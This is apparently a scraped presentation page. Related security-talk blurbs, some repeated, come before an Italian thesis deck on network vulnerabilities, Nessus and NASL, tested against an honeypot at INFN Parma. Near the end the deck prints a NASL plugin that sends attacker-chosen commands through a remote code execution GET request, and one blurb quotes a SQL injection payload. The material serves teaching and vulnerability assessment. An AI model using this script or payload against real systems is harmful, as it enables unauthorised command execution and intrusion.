С широко закрытыми глазами - риск-ориентированный подход к миграции в облакаVsevolod Shabad
Миграция в облака давно перестала быть хайпом - агитировать в пользу такой миграции уже незачем, почти все аргументы повторялись уже много раз.
Похоже, что на фоне множества аргументов в пользу миграции почти потерялись аргументы против нее. Зачастую, миграцией в облака движет мода, а отказом от миграции движут страхи и предубеждения.
Риск-ориентированный подход позволяет на основе трезвых оценок принять решение, мигрировать ли в публичное облако, строить частное и мигрировать в него, или отказаться от миграции и сосредоточиться на других задачах.
WiFi site survey report example - Acrylic heatmaps softwareatarasco
WiFi site survey example report generated with Acrylic WiFi Heatmaps.
Acrylic WiFi generates different wifi heat maps and channel/coverage analysis to improve your wlan networks.
Learn more about our <a>WLAN site survey software</a>
The Security Vulnerability Assessment Process & Best PracticesKellep Charles
Conducting regular security assessments on the organizational network and computer systems has become a vital part of protecting information-computing assets. Security assessments are a proactive and offensive posture towards information security as compared to the traditional reactive and defensive stance normally implemented with the use of Access Control-Lists (ACLs) and firewalls.
Too effectively conduct a security assessment so it is beneficial to an organization, a proven methodology must be followed so the assessors and assesses are on the same page.
This presentation will evaluate the benefits of credential scanning, scanning in a virtual environment, distributed scanning as well as vulnerability management.
С широко закрытыми глазами - риск-ориентированный подход к миграции в облакаVsevolod Shabad
Миграция в облака давно перестала быть хайпом - агитировать в пользу такой миграции уже незачем, почти все аргументы повторялись уже много раз.
Похоже, что на фоне множества аргументов в пользу миграции почти потерялись аргументы против нее. Зачастую, миграцией в облака движет мода, а отказом от миграции движут страхи и предубеждения.
Риск-ориентированный подход позволяет на основе трезвых оценок принять решение, мигрировать ли в публичное облако, строить частное и мигрировать в него, или отказаться от миграции и сосредоточиться на других задачах.
WiFi site survey report example - Acrylic heatmaps softwareatarasco
WiFi site survey example report generated with Acrylic WiFi Heatmaps.
Acrylic WiFi generates different wifi heat maps and channel/coverage analysis to improve your wlan networks.
Learn more about our <a>WLAN site survey software</a>
The Security Vulnerability Assessment Process & Best PracticesKellep Charles
Conducting regular security assessments on the organizational network and computer systems has become a vital part of protecting information-computing assets. Security assessments are a proactive and offensive posture towards information security as compared to the traditional reactive and defensive stance normally implemented with the use of Access Control-Lists (ACLs) and firewalls.
Too effectively conduct a security assessment so it is beneficial to an organization, a proven methodology must be followed so the assessors and assesses are on the same page.
This presentation will evaluate the benefits of credential scanning, scanning in a virtual environment, distributed scanning as well as vulnerability management.
This presentation contains the information about the OpenVAS understanding installation procedure in Linux and also contains the Working and it's screen shots
Vulnerability Management: What You Need to Know to Prioritize RiskAlienVault
Abstract:
While vulnerability assessments are an essential part of understanding your risk profile, it's simply not realistic to expect to eliminate all vulnerabilities from your environment. So, when your scan produces a long list of vulnerabilities, how do you prioritize which ones to remediate first? By data criticality? CVSS score? Asset value? Patch availability? Without understanding the context of the vulnerable systems on your network, you may waste time checking things off the list without really improving security.
Join AlienVault for this session to learn:
*The pros & cons of different types of vulnerability scans - passive, active, authenticated, unauthenticated
*Vulnerability scores and how to interpret them
*Best practices for prioritizing vulnerability remediation
*How threat intelligence can help you pinpoint the vulnerabilities that matter most
Find out the SOC Cyber Security at Steppa. Our SOC contains several capabilities like process and break down any PC translated information, assess and distinguish suspicious and maicious web and system activities, visualize and monitor all threats in real time.
Making Log Data Useful: SIEM and Log Management TogetherAnton Chuvakin
Outline for Making Log Data Useful: SIEM and Log Management Together by Dr. Anton Chuvakin @ Security Warrior Consulting
Security Information and Event Management vs/with Log Management
Graduating from LM to SIEM
SIEM and LM “best practices”
First steps with SIEM
Using SIEM and LM together
Conclusions
Alphorm.com Formation Analyse de Malware 1/2 : Le guide completAlphorm
L'intrusion de malwares dans le système d’informations d'une entreprise peut paralyser son activité, causer la fuite d'informations, ou même conduire à la perte de sommes importantes. Il est donc important de connaître le fonctionnement de ces applications malfaisantes afin de les identifier, les analyser et mettre en place les contremesures nécessaires.
Cette formation d'obtenir une vision panoramique de l'analyse de malware et de pouvoir mettre en pratique ces connaissances en situation réelle.
Illustrée par de nombreux cas pratiques, cette formation a aussi pour but d’appréhender l’analyse statique des malwares au niveau d’un environnement de travail sain pour éviter toute infection de l'environnement d'analyse.
Cybersecurity Risk Management for Financial InstitutionsSarah Cirelli
The New York State Department of Financial Services has been closely monitoring this ever-growing threat and has proposed regulations that would require financial services companies to adopt a cybersecurity program to protect their customers, employees, data and operations. Its proposed changes are expected to take effect on March 1, 2017. Financial services companies would have until Feb. 15, 2018, to submit a certificate of compliance with the program. Components of New York's proposed cybersecurity program are outlined in this article.
Architecture centric support for security orchestration and automationChadni Islam
The presentation was prepared for the University of Adelaide School of Computer Science Research Seminar Series. See the slides to know
- what is security orchestration?
- what are the key challenges in this domain?
- how software architecture can play a role in improving the design decision of security orchestration and automation platform?
Il 20 aprile 2003, presso la Scuola Superiore dell'Amministrazione dell'Interno, Vincenzo Calabrò ha tenuto un seminario dal titolo: Sicurezza in Rete. Questo seminario introduce ai principi, la metodologia ed alcune applicazioni pratiche relative alla Sicurezza in Rete.
https://www.vincenzocalabro.it
This presentation contains the information about the OpenVAS understanding installation procedure in Linux and also contains the Working and it's screen shots
Vulnerability Management: What You Need to Know to Prioritize RiskAlienVault
Abstract:
While vulnerability assessments are an essential part of understanding your risk profile, it's simply not realistic to expect to eliminate all vulnerabilities from your environment. So, when your scan produces a long list of vulnerabilities, how do you prioritize which ones to remediate first? By data criticality? CVSS score? Asset value? Patch availability? Without understanding the context of the vulnerable systems on your network, you may waste time checking things off the list without really improving security.
Join AlienVault for this session to learn:
*The pros & cons of different types of vulnerability scans - passive, active, authenticated, unauthenticated
*Vulnerability scores and how to interpret them
*Best practices for prioritizing vulnerability remediation
*How threat intelligence can help you pinpoint the vulnerabilities that matter most
Find out the SOC Cyber Security at Steppa. Our SOC contains several capabilities like process and break down any PC translated information, assess and distinguish suspicious and maicious web and system activities, visualize and monitor all threats in real time.
Making Log Data Useful: SIEM and Log Management TogetherAnton Chuvakin
Outline for Making Log Data Useful: SIEM and Log Management Together by Dr. Anton Chuvakin @ Security Warrior Consulting
Security Information and Event Management vs/with Log Management
Graduating from LM to SIEM
SIEM and LM “best practices”
First steps with SIEM
Using SIEM and LM together
Conclusions
Alphorm.com Formation Analyse de Malware 1/2 : Le guide completAlphorm
L'intrusion de malwares dans le système d’informations d'une entreprise peut paralyser son activité, causer la fuite d'informations, ou même conduire à la perte de sommes importantes. Il est donc important de connaître le fonctionnement de ces applications malfaisantes afin de les identifier, les analyser et mettre en place les contremesures nécessaires.
Cette formation d'obtenir une vision panoramique de l'analyse de malware et de pouvoir mettre en pratique ces connaissances en situation réelle.
Illustrée par de nombreux cas pratiques, cette formation a aussi pour but d’appréhender l’analyse statique des malwares au niveau d’un environnement de travail sain pour éviter toute infection de l'environnement d'analyse.
Cybersecurity Risk Management for Financial InstitutionsSarah Cirelli
The New York State Department of Financial Services has been closely monitoring this ever-growing threat and has proposed regulations that would require financial services companies to adopt a cybersecurity program to protect their customers, employees, data and operations. Its proposed changes are expected to take effect on March 1, 2017. Financial services companies would have until Feb. 15, 2018, to submit a certificate of compliance with the program. Components of New York's proposed cybersecurity program are outlined in this article.
Architecture centric support for security orchestration and automationChadni Islam
The presentation was prepared for the University of Adelaide School of Computer Science Research Seminar Series. See the slides to know
- what is security orchestration?
- what are the key challenges in this domain?
- how software architecture can play a role in improving the design decision of security orchestration and automation platform?
Il 20 aprile 2003, presso la Scuola Superiore dell'Amministrazione dell'Interno, Vincenzo Calabrò ha tenuto un seminario dal titolo: Sicurezza in Rete. Questo seminario introduce ai principi, la metodologia ed alcune applicazioni pratiche relative alla Sicurezza in Rete.
https://www.vincenzocalabro.it
Introduzione alle metodologie e tipologie di strumenti per il rilevamento di intrusioni informatiche.
Talk tenuto da Alessandro Tanasi (http://www.tanasi.it)
Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...Simone Onofri
Ultimamente il mercato dello sviluppo software, e contestualmente quello della sicurezza, si stanno focalizzando sulle applicazioni mobile. Come indicano il report XForce di IBM e il Melani del Governo Svizzero, tali applicazioni sono spesso bersaglio di attacchi. Non a caso OWASP ha stilato una TOP 10 per le applicazioni mobile. Ispirandosi ad OWASP e ai test svolti sul campo saranno presentate le maggiori problematiche e le soluzioni per rendere piu sicure le proprie applicazioni.
Dopo una breve introduzione del progetto BackBox, illustreremo le caratteristiche principali di questa nuova versione della Distribuzione con particolare riferimento alla sezione “Mobile Analysis”.
Introdurremo tools e best practices per condurre penetration test su applicazioni Android.
Cybersecurity e Vulnerabilita' dei sistemi SCADAiDIALOGHI
First presented at "IBM Safety & Security Workshop for Energy & Utilities" in Milan Sept. 2011, the presentation describes the growing cybersecurity threats menacing SCADA / DCS systems worldwide.
Cyber Security Threats for Healthcare
Author: Pierguido Iezzi
Abstract: La digital evolution del mondo sanitario deve affrontare i vecchi e i nuovi rischi del Cybercrime. I nuovi cyberattack sono multidisciplinari e interdisciplinari. Una combinazione di Hardware Hacking associate a metodologie di Mobile & IOT Hack con phishing. Quali sono i rischi per il mondo Sanitario? Scopriamo insieme cosa ci aspetta il futuro prossimo per poter definire le corrette strategie di difesa e di gestione della CyberSecurity in ambito Healthcare.
https://www.swascan.com
CCI 2019 - SQL Injection - Black Hat Vs White Hatwalk2talk srl
Knock Knock?
Who's There?
'OR 1=1; /*
<door opens>
SQL Injection mantiene inalterata la prima posizione nella OWASP Top 10.
Scopriamo cos'è e come mitigarla.
By Mirko Strozzi
In Aziende medio grandi, con centinaia di postazioni di lavoro, dispositivi mobile e server in cloud e on premises, la Digital Forensics e soprattutto l’approccio DFIR sono strumenti fondamentali per gestire in efficienza ed efficacia situazioni di incident handling come data breach o violazione dei sistemi, ma anche per la gestione di indagini e investigazioni informatiche aziendali per la tutela del patrimonio aziendale: proprietà intellettuale, protezione dati, dipendenti infedeli, furti di informazioni riservate; inoltre processi e strumenti della DF e della DFIR possono essere usati proficuamente per Audit di sicurezza in ambito ISO, Dlgs 231/01, GDPR, COBIT, etc.. garantendo una raccolta delle prove di tipo "forense".
Velociraptor e AWX Ansible due strumenti open molto diversi che si usano in ambito corporate per eseguire indagini informatiche e raccogliere prove su larga scala con modalità forensi.
La sicurezza delle informazioni nell’era del Web 2.0hantex
Progetto wiki promosso da IBM per discutere sul tema della sicurezza informatica e, nello specifico, di come gli strumenti offerti dal web 2.0 possano essere amministrati senza mettere a repentaglio la sicurezza dei sistemi
Similar to Presentazione Tesi di Laurea sulla Sicurezza delle Reti Informatiche: Le vulnerabilità (20)
La sicurezza delle informazioni nell’era del Web 2.0
Presentazione Tesi di Laurea sulla Sicurezza delle Reti Informatiche: Le vulnerabilità
1. RAFT
Sicurezza delle Reti Informatiche
Le vulnerabilit`a
Riccardo Melioli
27 ottobre 2016
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 1 / 19
2. RAFT
Obiettivi
Obiettivi
Metodi utilizzati per l’attacco e la difesa delle reti informatiche.
Vulnerabilit`a e tool inerenti.
Caso d’uso alla rete INFN di Parma.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 2 / 19
3. RAFT
Cos’`e la Sicurezza informatica
Sicurezza informatica
analisi delle vulnerabilit`a.
analisi del rischio.
analisi delle minacce.
protezione dell’integrit`a logico-funzionale.
Sicurezza delle reti informatiche
verifica della presenza delle vulnerabilit`a nella rete.
sicurezza delle comunicazioni tra i nodi della rete.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 3 / 19
4. RAFT
Perch´e studiarla
Informatizzazione della societ`a
La crescente informatizzazione della societ`a e dei servizi hanno aumentato
progressivamente l’interesse nella sicurezza informatica, in particolare i
settori dove le informazioni sono di importanza critica.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 4 / 19
5. RAFT
Problematiche della sicurezza delle reti
Compromesso Sicurezza-Usabilit`a
Compromesso tra le misure di sicurezza da adottare per proteggere la rete
da accessi indesiderati e l’usabilit`a con cui viene utilizzata.
Presenza Vulnerabilit`a
Presenza di falle che possono compromettere l’intero funzionamento della
rete stessa e l’integrit`a dei nodi da cui `e composta.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 5 / 19
6. RAFT
Definizione
Vulnerabilit`a
Componente di un sistema, in corrispondenza alla quale le misure di
sicurezza possono essere assenti o ridotte, rappresentando un punto
debole del sistema e permettendo ad un eventuale aggressore di
comprometterne il livello di sicurezza.
Le vulnerabilit`a sono dovute a:
Bug del software;
Problematiche dovute al funzionamento di protocolli.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 6 / 19
7. RAFT
Categorizzazione
Categorie di Vulnerabilit`a
Le categorie delle vulnerabilit`a sono identificate in base al tipo di
disservizio che possono causare.
Nell’immagine sono quantificate le vulnerabilit`a, suddivise per tipo di disservizio, rilevate in internet dal 1999 ad Agosto 2016
[CVE Details].
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 7 / 19
8. RAFT
Vulnerability Database
Vulnerability Database
Un Vulnerability Database `e una piattaforma volta a raccogliere,
mantenere e diffondere informazioni sulle vulnerabilit`a scoperte nei
sistemi informatici.
I database di vulnerabilit`a identificano le vulnerabilit`a, tramite le CVE
(Common Vulnerabilities and Exposures) e ne classificano la gravit`a
tramite CVSS.
Ad ogni vulnerabilit`a CVE `e associato uno score CVSS, che `e un valore
tra 0 e 10 stimato in base a delle metriche:
Access Vector;
Integrity;
...
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 8 / 19
9. RAFT
Valutare il livello di sicurezza di un sistema
Vulnerability Assessment
Processo volto a valutare l’efficacia dei meccanismi di sicurezza, si
suddivide nelle seguenti fasi:
1 Individuazione delle vulnerabilit`a.
2 Quantificazione della gravit`a.
3 Assegnazione delle priorit`a.
Vulnerability Scanner
Programmi progettati per ricercare e valutare le vulnerabilit`a di
un’applicazione, di un computer o di una rete.
Solitamente orientati alle grandi reti perci`o effettuano scansioni ad ampio
spettro e non invasive.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 9 / 19
10. RAFT
Nessus
Architettura
Nessus `e strutturato per l’utilizzo di plugin, che lo rendono dinamico e
flessibile, in base al tipo di scansione richiesta. E’ composto da:
Manager: core dell’applicazione.
Interprete NASL: esegue i plugin scritti in linguaggio NASL.
Scansione delle vulnerabilit`a in Nessus
1 Verifica quali host sono attivi nella rete.
2 Effettua port scanning per ogni host attivo.
3 Ricerca le vulnerabilit`a tramite test non invasivi, effettuati con i relativi
plugin.
4 Identifica le vulnerabilit`a tramite confronto con il vulnerability database.
5 Genera un report.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 10 / 19
11. RAFT
Metodologia per la verifica della presenza vulnerabilit`a
Problemi
I Vulnerability scanner possono presentare le seguenti problematiche:
generazione falsi positivi in situazioni dove vi sono sistemi di difesa
(Firewall, Proxy, IDS, ...);
informazioni superficiali a causa della non invasivit`a delle scansioni,
per non compromette i sistemi.
Soluzione
Approfondire le scansioni verificando l’effettiva presenza mediante
l’utilizzo di plugin in NASL opportunamente sviluppati per quelle
vulnerabilit`a.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 11 / 19
12. RAFT
Perch´e utilizzare il linguaggio NASL?
Cos’`e
NASL(Nessus Attack Scripting Language) `e un linguaggio di scripting
specializzato per l’ambito delle reti, che consente di sviluppare plugin in
grado di compiere attacchi a diversi livelli della pila ISO/OSI.
Vantaggi
Semplicit`a: `e provvisto di librerie specializzate per gli attacchi,
rendendo semplice e veloce la creazione di plugin.
Sicurezza: Nessus esegue i plugin isolati dal sistema operativo
dell’attaccante, garantendo il completo anonimato.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 12 / 19
13. RAFT
Caso d’uso: Rete INFN Parma
Obiettivo
Applicare la teoria studiata alla rete INFN, quindi si `e utilizzata la
metodologia precedentemente vista, composta dalle seguenti fasi:
1 Scansione non invasiva delle vulnerabilit`a mediante Nessus.
2 Sviluppo di un plugin che utilizzi una vulnerabilit`a rilevata per
effettuare un attacco, verificandone di conseguenza la presenza.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 13 / 19
14. RAFT
Problematiche nell’effettuare l’attacco
Tutela dei dati e business continuity dell’INFN
Per motivi di privacy dei dati presenti su tali host e per motivi di business
continuity dei progetti INFN, si `e messo a disposizione un honeypot,
appositamente inserito nella rete INFN.
Honeypot
Componente hardware o software che sembra essere parte della rete e
contenere informazioni, ma che in realt`a `e ben isolato e non ha contenuti
sensibili o critici.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 14 / 19
23. RAFT
Plugin in NASL utilizzato per l’attacco
RCE attack (Remote Code Execution)
Attacco che permette all’attaccante di eseguire qualsiasi comando da
remoto su un potenziale obiettivo, che pu`o essere un elaboratore o un
processo eseguito da esso.
Fasi Attacco
1 Identificazione Host e path del file vulnerabile nel server Web.
2 Scelta comando da eseguire sulla macchina della vittima.
3 Formattazione e composizione URI in modo che sfrutti la
vulnerabilit`a.
4 Effettua la richiesta GET dell’URI.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 16 / 19
24. RAFT
ipAddress = get_host_ip ();
port = get_http_port(default :80);
file = prompt(” Path f i l e v u l n e r a b i l e : ”);
param = prompt(”Nome Parametro : ”);
cmd = prompt(”Comando da e s e g u i r e : ”);
cmd = str_replace(string: cmd , find: ” ”, replace: ”
%20”);
finalString = strcat(” http : / / ”, ipAddress , file , ” ? ”,
param , ”=”, cmd);
soc = http_open_socket (port);
request = http_get(port: port , item: finalString);
send(socket:soc , data: request);
resp = http_recv(socket: soc);
http_close_socket (soc);
¥
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 17 / 19
27. RAFT
Conclusioni e Sviluppi Futuri
Conclusioni
Con il presente lavoro sono stati analizzati i metodi utilizzati per l’attacco
e la difesa delle reti informatiche, illustrando con particolare attenzione le
vulnerabilit`a, ed infine con l’applicazione del caso d’uso si `e dimostrato
quando visto.
Sviluppi futuri
Un possibile sviluppo futuro, avendo disponibilit`a di calcolo e di
monitoraggio adeguate, sarebbe di estendere quanto visto ed applicato a
reti di dimensione maggiori.
Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 18 / 19